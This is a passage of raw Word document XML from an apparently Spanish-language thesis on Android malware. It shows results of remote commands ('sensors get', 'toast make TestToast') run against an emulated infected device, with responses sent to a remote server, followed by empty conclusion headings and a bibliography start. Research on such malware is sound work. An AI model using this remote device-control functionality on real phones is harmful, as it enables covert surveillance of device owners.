          <v:shape id="Picture 242" o:spid="_x0000_s2089" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:133.55pt;margin-top:5.35pt;width:148.25pt;height:159.45pt;z-index:43;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v:imagedata r:id="rId75" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFAF1F" w14:textId="5286E250" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D40E4E" w14:textId="60EC80C5" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077F86D1" w14:textId="102762EE" w:rsidR="002539AF" w:rsidRPr="00301FDA" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sensors get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263B0B4" w14:textId="77777777" w:rsidR="002539AF" w:rsidRPr="00301FDA"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n-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48019082" w14:textId="209568AF" w:rsidR="002539A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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5506F2" w14:textId="77777777" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244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Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BC5B65" w14:textId="214F583E" w:rsidR="002539AF" w:rsidRPr="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002539AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">{data=[{"name":"Genymotion Accelerometer","vendor":"Genymobile","type":1},{"name":"Genymotion Magnetometer","vendor":"Genymobile","type":2},{"name":"Genymotion Gyroscope","vendor":"Genymobile","type":4},{"name":"Genymotion Light","vendor":"Genymobile","type":5},{"name":"Genymotion Pressure","vendor":"Genymobile","type":6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9ABA81" w14:textId="154F81AD" w:rsidR="002539AF" w:rsidRDefault="00C363A9" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C363A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[…] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C363A9">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Omisión del resto de datos debido a su longitud. Se trata de un listado detallado de todos los sensores registrados en el dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DF679" w14:textId="77777777" w:rsidR="006E659E" w:rsidRDefault="006E659E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAFC030" w14:textId="45332B56" w:rsidR="006E659E" w:rsidRPr="006E659E" w:rsidRDefault="006E659E" w:rsidP="006E659E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E659E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E659E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>toast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> make TestToast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C9615" w14:textId="77777777" w:rsidR="006E659E" w:rsidRPr="006E659E" w:rsidRDefault="006E659E" w:rsidP="006E65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p>
    <w:p w14:paraId="1E02E440" w14:textId="46A97551" w:rsidR="006E659E" w:rsidRPr="00A610E8" w:rsidRDefault="006E659E" w:rsidP="006E659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ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E659E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="006E659E">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E659E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D08DE" w14:textId="7FE31BAB" w:rsidR="00A610E8" w:rsidRDefault="00A610E8"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color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A610E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data={"command":"toast","result":"The toast [TestToast] is shown","type":"1"}, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFA654" w14:textId="77777777" w:rsid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1E91A439" w14:textId="79622E61" w:rsid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r w:rsidRPr="00494559">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resultado adicional obtenido:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> generación de una notificación de tipo Toast en el dispositivo infectado con el texto indicado por el servidor remoto, como se muestra a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C5932" w14:textId="77777777" w:rsid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Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9BDB53" w14:textId="77777777" w:rsidR="00A96299" w:rsidRPr="00A96299" w:rsidRDefault="00A96299" w:rsidP="00A610E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Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3983A723" w14:textId="0C02CAA8" w:rsidR="006E659E" w:rsidRPr="00A96299" w:rsidRDefault="00000000" w:rsidP="006E659E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1811ED65">
          <v:shape id="Picture 243" o:spid="_x0000_s2088" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:121.2pt;height:238.05pt;z-index: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v:imagedata r:id="rId76" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="006E659E" w:rsidRPr="00A96299">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47963DA2" w14:textId="77777777" w:rsidR="006E659E" w:rsidRPr="00A96299" w:rsidRDefault="006E659E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA245A4" w14:textId="77777777" w:rsidR="006E659E" w:rsidRPr="00A96299" w:rsidRDefault="006E659E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776F1044" w14:textId="69C744AB" w:rsidR="00E95A92" w:rsidRPr="00A96299" w:rsidRDefault="003104CA" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96299">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00E95A92" w:rsidRPr="00A96299">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capítulo 5: Conclusión</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="7ACFF60A" w14:textId="347B7341" w:rsidR="00E95A92" w:rsidRPr="00A96299" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171EC8B5" w14:textId="4AE25D7D" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>En este apartado se comenta</w:t>
      </w:r>
      <w:r w:rsidR="00851E3C">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>rá</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">n los resultados obtenidos </w:t>
      </w:r>
      <w:r w:rsidR="00CE1291">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>previamente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>, las aportaciones que se han realizado, se mencionan posibles ampliaciones que se podrían realizar en el futuro, se mencionan los problemas encontrados durante la realización de la tesis y, por último, se encuentra una sección de opiniones en la que se emitirán algunas valoraciones a título personal tras la realización del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130690F6" w14:textId="459E07BC" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B91121" w14:textId="2E03F890" w:rsidR="00682BDD" w:rsidRDefault="00682BDD" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF3F299" w14:textId="1A0D65A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4" w:name="_Toc107862714"/>
      <w:bookmarkStart w:id="75" w:name="_Toc170500177"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5.1   APORTACIONES REALIZADAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="12AED17E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A796A1" w14:textId="19F8781C" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534A7FBF" w14:textId="5E47A494"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6" w:name="_Toc107862715"/>
      <w:bookmarkStart w:id="77" w:name="_Toc170500178"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2   AMPLIACIONES </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FUTURAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="6C139362" w14:textId="5E719CEF" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4609FE01" w14:textId="25EFB02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78" w:name="_Toc107862716"/>
      <w:bookmarkStart w:id="79" w:name="_Toc170500179"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5.3   PROBLEMAS ENCONTRADOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="08623951" w14:textId="4B779E91" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3DA0CF" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc107862717"/>
      <w:bookmarkStart w:id="81" w:name="_Toc170500180"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5.4   OPINIONES PERSONALES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="464EEA82" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8757BD" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DD7AF" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12882F3E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc107862718"/>
      <w:bookmarkStart w:id="83" w:name="_Toc170500181"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Bibliografía</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="0D8908C3" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="5D21CCE5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pP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E95A92" w:rsidRPr="00362542" w14:paraId="19F5A51C" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74BE65E6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">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[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47581A4C" w14:textId="7312E8D2" w:rsidR="004331B7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:color w:val="0563C1"/>
                <w:u w:val="single"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId77" w:history="1">
              <w:r w:rsidR="004331B7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                  <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>https://www.researchgate.net/publication/312129902_Android_Fragmentation_Classification_Causes_Problems_and_Solutions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004331B7" w:rsidRPr="00362542" w14:paraId="3AC770AD" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E78AC1" w14:textId="4119F062" w:rsidR="004331B7" w:rsidRDefault="004331B7">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 xml:space="preserve">[2] </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C2F897" w14:textId="30E3C6A0" w:rsidR="008F2703" w:rsidRDefault="00000000">
